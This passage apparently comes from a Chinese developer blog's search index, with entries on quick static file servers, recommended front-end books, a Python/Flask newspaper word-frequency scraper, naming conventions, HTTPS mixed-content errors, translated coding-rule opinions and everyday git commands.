anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2019/10/hvqggd/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 
127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":"1. Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。\n","permalink":"https://wdd.js.org/fe/gitbook-good-book/","summary":"1. 
Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。","title":"Gitbook好书推荐"},{"content":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 
工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheerio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.js python版本 sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) # 解决控制台中文乱码 USELESSWORDS = [\u0026#39;的\u0026#39;,\u0026#39;要\u0026#39;,\u0026#39;了\u0026#39;,\u0026#39;在\u0026#39;,\u0026#39;和\u0026#39;,\u0026#39;是\u0026#39;,\u0026#39;把\u0026#39;,\u0026#39;向\u0026#39;,\u0026#39;上\u0026#39;,\u0026#39;为\u0026#39;,\u0026#39;等\u0026#39;,\u0026#39;个\u0026#39;] # 标记一些无用的单词 TOP = 30 # 只要前面的30个就可以了 def _remove_punctuation(line): # 移除非中文字符 # rule = re.compile(\u0026#34;[^a-zA-Z0-9\\u4e00-\\u9fa5]\u0026#34;) rule = re.compile(\u0026#34;[^\\u4e00-\\u9fa5]\u0026#34;) line = rule.sub(\u0026#39;\u0026#39;,line) return line def _calculate_frequency(words): # 计算分词出现的次数 result = {} res = [] for word in words: if result.get(word, -1) == -1: result[word] = 1 else: result[word] += 1 for word in result: if _.contains(USELESSWORDS, word): # 排除无用的分词 continue res.append({ \u0026#39;word\u0026#39;: word, \u0026#39;fre\u0026#39;: result[word] }) return _.sortBy(res, \u0026#39;fre\u0026#39;)[::-1][:TOP] # 降序排列 def _get_page(url): # 获取页面 return requests.get(url) def 
_get_text(req): # 获取文章部分 return pq(req.content)(\u0026#39;#ozoom\u0026#39;).text() def main(url): # 入口函数,函数组合 return _.compose( _get_page, _get_text, _remove_punctuation, _jieba.cut, _calculate_frequency )(url) 6. python服务端:Flask浅入浅出 import word_rank from flask import Flask, request, jsonify, render_template app = Flask(__name__) app.debug = True @app.route(\u0026#39;/rank\u0026#39;) # 从query参数里获取pageUrl,并给分词排序 def getRank(): pageUrl = request.args.get(\u0026#39;pageUrl\u0026#39;) app.logger.debug(pageUrl) rank = word_rank.main(pageUrl) app.logger.debug(rank) return jsonify(rank) @app.route(\u0026#39;/\u0026#39;) # 主页面 def getHome(): return render_template(\u0026#39;home.html\u0026#39;) if __name__ == \u0026#39;__main__\u0026#39;: app.run() 7. 总结 据说有个定律:凡是能用JavaScript写出来的,最终都会用JavaScript写出来。 我是很希望这样啦。但是不得不承认,python上有很多非常优秀的库。这些库在npm上并没有找到合适的替代品。\n所以,我就想: 如何能用nodejs直接调用python的第三方库\n目前的解决方案有两种,第一,只用nodejs的child_processes。这个方案我试过,但是不太好用。\n第二,npm里面有一些包,可以直接调用python的库。例如:node-python, python.js, 但是这些包我在win7上安装的时候总是报错。而且解决方法也蛮麻烦的。索性我就直接用python了。\n最后附上项目地址:https://github.com/wangduanduan/read-newspaper\n","permalink":"https://wdd.js.org/posts/2019/10/rmsqoa/","summary":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 
函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.","title":"python实战 报纸分词排序"},{"content":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5. 使用可搜索的名称 // bad var e = \u0026#39;not found\u0026#39;; // 想搜e, 就很难搜 // good var ERROR_NO_FOUND = \u0026#39;not found\u0026#39;; 6. 方法名一概是动词短语 // good function createAgent(){} funtion deleteAgent(){} function updateAgent(){} function queryAgent(){} 7. 尽量不要用单字母名称, 除了用于循环 // bad var i = 1; // good for(var i=0; i\u0026lt;10; i++){ ... } // very good userList.forEach(function(user){ ... }); 8. 每个概念对应一个词 controller和manager, 没什么区别,要用controller都用controller, 要用manager都用manager, 不要混着用 9. 建立项目词汇表, 不要随意创造名称 user, agent, org, queue, activity, device... 10. 参考资料 《代码整洁之道》 《明朝那些事儿》 ","permalink":"https://wdd.js.org/posts/2019/10/ouvbom/","summary":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 
你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAccount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5. 使用可搜索的名称 // bad var e = \u0026#39;not found\u0026#39;; // 想搜e, 就很难搜 // good var ERROR_NO_FOUND = \u0026#39;not found\u0026#39;; 6. 方法名一概是动词短语 // good function createAgent(){} function deleteAgent(){} function updateAgent(){} function queryAgent(){} 7. 尽量不要用单字母名称, 除了用于循环 // bad var i = 1; // good for(var i=0; i\u0026lt;10; i++){ ... } // very good userList.forEach(function(user){ ... }); 8. 每个概念对应一个词 controller和manager, 没什么区别,要用controller都用controller, 要用manager都用manager, 不要混着用 9. 建立项目词汇表, 不要随意创造名称 user, agent, org, queue, activity, device... 10. 参考资料 《代码整洁之道》 《明朝那些事儿》 ","permalink":"https://wdd.js.org/posts/2019/10/ouvbom/","summary":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAccount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5.","title":"代码整洁之道 - 有意义的命名"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n","permalink":"https://wdd.js.org/network/of5hny/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. 
HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。","title":"可能被遗漏的https与http的知识点"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也可以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 
自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2019/10/corgz1/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 
当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是浪费时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?”但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟 × 5天 × 21天 × 12个月 = 6300分钟 = 105小时 = 13.125天 ≈ 5250$。如果你有40 000名员工,这将需要多少费用?","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉取远程代码到本地,否则有可能被拒绝 git pull 每次拉取都要执行 拉取远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.1.1. 状态查看 查看当前仓库状态\ngit status 2.2. 分支管理 2.2.1. 分支新建 基于当前分支,创建dev分支\n// 创建dev分支 git branch dev // 创建dev分支后,切换到dev分支 git checkout -b dev // 以某个commitId为起点创建分支 git checkout -b new-branch-name commit-id 2.2.2. 分支查看 查看远程分支: git branch -r\n// 查看本地分支 git branch // 查看远程分支 git branch -r // 查看所有分支 git branch -a 2.2.3. 分支切换 切换到某个分支: git checkout 0.10.7\n\u0026gt; git checkout 0.10.7 Branch 0.10.7 set up to track remote branch 0.10.7 from origin. Switched to a new branch \u0026#39;0.10.7\u0026#39; 2.2.4. 分支合并 将master分支合并到0.10.7分支: git merge\n\u0026gt; git merge master Merge made by the \u0026#39;recursive\u0026#39; strategy. 
